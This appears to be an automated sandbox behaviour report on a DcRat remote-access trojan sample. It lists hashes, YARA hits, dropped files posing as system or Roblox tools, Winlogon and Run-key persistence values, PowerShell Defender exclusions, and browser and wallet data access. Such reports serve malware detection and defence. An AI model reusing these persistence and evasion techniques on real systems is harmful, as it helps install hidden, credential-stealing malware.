Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-07-2024 20:24
Behavioral task
behavioral1
Sample
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
Resource
win10v2004-20240709-en
General
-
Target
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
-
Size
9.5MB
-
MD5
4050f2027e946d524e3a1078a6cd5419
-
SHA1
698f02a2826e7d6ecfebf37b04f0231c904133eb
-
SHA256
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
-
SHA512
fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab
-
SSDEEP
196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2972 schtasks.exe 2900 schtasks.exe 1028 schtasks.exe 2528 schtasks.exe 2500 schtasks.exe 1152 schtasks.exe 964 schtasks.exe 1436 schtasks.exe 2620 schtasks.exe 1020 schtasks.exe 2408 schtasks.exe 2656 schtasks.exe 1624 schtasks.exe 2696 schtasks.exe Key opened \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\14.0\Common 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe 2100 schtasks.exe 1620 schtasks.exe 2316 schtasks.exe 1948 schtasks.exe 284 schtasks.exe 1616 schtasks.exe 1944 schtasks.exe 1156 schtasks.exe 2272 schtasks.exe 1492 schtasks.exe 2248 schtasks.exe 2916 schtasks.exe 1568 schtasks.exe 2000 schtasks.exe 1632 schtasks.exe 2716 schtasks.exe 1784 schtasks.exe 2712 schtasks.exe 1736 schtasks.exe 1696 schtasks.exe 2772 schtasks.exe 2684 schtasks.exe 2284 schtasks.exe 2920 schtasks.exe 2268 schtasks.exe 2088 schtasks.exe 2740 schtasks.exe 2072 schtasks.exe 2404 schtasks.exe 2620 schtasks.exe 2716 schtasks.exe 1344 schtasks.exe 2708 schtasks.exe 2540 schtasks.exe 2520 schtasks.exe 1624 schtasks.exe 1392 schtasks.exe 2116 schtasks.exe 2056 schtasks.exe 1972 schtasks.exe 1780 schtasks.exe 1644 schtasks.exe 2556 schtasks.exe 1228 schtasks.exe 2912 schtasks.exe 2968 schtasks.exe 2312 schtasks.exe 2224 schtasks.exe 2576 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 18 IoCs
Processes:
Refcrt.exeRoblox.exesddsfsdf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" sddsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" Refcrt.exe -
Process spawned unexpected child process 51 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 940 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2500 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 284 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2576 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1508 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1616 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1944 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2316 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1720 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2056 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1820 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1152 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2968 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2916 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1972 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2740 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2772 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2684 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1968 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2768 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2960 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2072 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 840 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2496 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1156 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2404 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2920 2820 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2268 2820 schtasks.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Youtube.exe dcrat behavioral1/memory/1976-19-0x0000000000400000-0x0000000000D8F000-memory.dmp dcrat \Users\Admin\AppData\Local\Temp\Result.exe dcrat \Users\Admin\AppData\Local\Temp\solara.exe dcrat behavioral1/memory/2740-63-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral1/memory/2548-90-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe dcrat behavioral1/memory/2980-107-0x0000000000010000-0x0000000000194000-memory.dmp dcrat behavioral1/memory/848-187-0x0000000000CD0000-0x0000000000E54000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2348 powershell.exe 1292 powershell.exe 1576 powershell.exe 2880 powershell.exe 2440 powershell.exe 2640 powershell.exe 1692 powershell.exe 2040 powershell.exe 1788 powershell.exe 2432 powershell.exe 2756 powershell.exe 2888 powershell.exe 3032 powershell.exe 1484 powershell.exe 1276 powershell.exe 2360 powershell.exe 2592 powershell.exe 2228 powershell.exe 2404 powershell.exe 940 powershell.exe 2468 powershell.exe 1952 powershell.exe 584 powershell.exe 708 powershell.exe 912 powershell.exe 564 powershell.exe 1952 powershell.exe 2728 powershell.exe 2596 powershell.exe 2780 powershell.exe 1044 powershell.exe 1724 powershell.exe 1772 powershell.exe 2100 powershell.exe 2072 powershell.exe 2040 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Youtube.exe net_reactor behavioral1/memory/1976-19-0x0000000000400000-0x0000000000D8F000-memory.dmp net_reactor behavioral1/memory/2548-90-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Executes dropped EXE 16 IoCs
Processes:
Youtube.exesddsfsdf.exeResult.exeDCRatBuild.exeBloxstrap.exeSolaraBootstrapper.exesolara.exeFrage build.exeRefcrt.exesppsvc.exeComContainerbrowserRefRuntime.exeRoblox.exeWerFault.exeBloxstrap.exeRoblox.exesihost64.exepid process 2548 Youtube.exe 2372 sddsfsdf.exe 2740 Result.exe 2908 DCRatBuild.exe 2752 Bloxstrap.exe 1192 SolaraBootstrapper.exe 1972 solara.exe 1212 Frage build.exe 2980 Refcrt.exe 848 sppsvc.exe 2976 ComContainerbrowserRefRuntime.exe 1856 Roblox.exe 2096 WerFault.exe 1744 Bloxstrap.exe 2404 Roblox.exe 236 sihost64.exe -
Loads dropped DLL 40 IoCs
Processes:
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exeYoutube.exeResult.exeDCRatBuild.exeSolaraBootstrapper.exesolara.exeFrage build.execmd.exeMsiExec.exeMsiExec.exeWerFault.execmd.execmd.execmd.execonhost.exepid process 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe 2548 Youtube.exe 2548 Youtube.exe 2548 Youtube.exe 1976 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe 2548 Youtube.exe 2548 Youtube.exe 2740 Result.exe 2740 Result.exe 2740 Result.exe 2548 Youtube.exe 2908 DCRatBuild.exe 2548 Youtube.exe 2908 DCRatBuild.exe 2740 Result.exe 1192 SolaraBootstrapper.exe 1192 SolaraBootstrapper.exe 2740 Result.exe 1972 solara.exe 1972 solara.exe 2548 Youtube.exe 1212 Frage build.exe 1212 Frage build.exe 784 cmd.exe 784 cmd.exe 1948 MsiExec.exe 1948 MsiExec.exe 1968 MsiExec.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2112 cmd.exe 2112 cmd.exe 2136 cmd.exe 2136 cmd.exe 2712 cmd.exe 2620 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 35 IoCs
Processes:
Refcrt.exeRoblox.exesddsfsdf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" 